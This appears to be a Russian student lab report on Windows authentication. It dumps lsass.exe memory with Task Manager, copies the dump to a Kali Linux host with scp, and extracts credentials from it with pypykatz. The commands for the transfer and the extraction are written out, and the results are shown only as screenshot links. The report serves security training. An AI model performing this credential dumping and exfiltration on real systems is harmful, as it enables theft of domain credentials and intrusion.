# Практическая работа №3 *ААА в Windows* --- # Занятие 3 - *ААА в Windows* # Задание: 1) Проанализировать память процесса lsass.exe ## Часть 1. Анализ памяти Lsass.exe #### 1.1 Зашли под учётной записью Ольги и обращаемся к ресурсам домена ![](https://i.imgur.com/CJmmJ56.png) #### 1.2 Заходим под учётной записью Петра и открываем командную строку от имени администратора, введя данные админа ![](https://i.imgur.com/KrJId4A.png) #### 1.3 Узнаем кто мы в системе командой whoami ![](https://i.imgur.com/U7Z0ZrW.png) #### 1.4 Запускаем диспетчер задач от имени администратора и вводим данные учётной записи админа ![](https://i.imgur.com/eTLt6sb.png) #### 1.5 В подробностях находим процесс lsass.exe и делаем дамп этого процесса ![](https://i.imgur.com/e3mQmoq.png) #### 1.6 Файл дампа создан ![](https://i.imgur.com/gv2mnlG.png) #### 1.7 Заходим в kali linux и включаем подключение по ssh ![](https://i.imgur.com/Hxw0zJz.png) #### 1.8 Передаём файл дампа, созданный ранее на нашу kali linux ```bash= scp C:\Users\ADMpetr\AppData\Local\Temp\lsass.DMP kali@192.168.10.6:/home/kali ``` ![](https://i.imgur.com/cYOE5cZ.png) #### 1.9 Убеждаемся, что файл передался ![](https://i.imgur.com/w0SE9tH.png) #### 1.10 Выполняем скрипт Для начала скачиваем скрипт с репозитория ```bash= git clone <https://github.com/skelsec/pypykatz ``` Затем запускаем скрипт ```bash= pypykatz lsa minidump /home/kali/lsass.DMP ``` ![](https://i.imgur.com/NhdCwhC.png)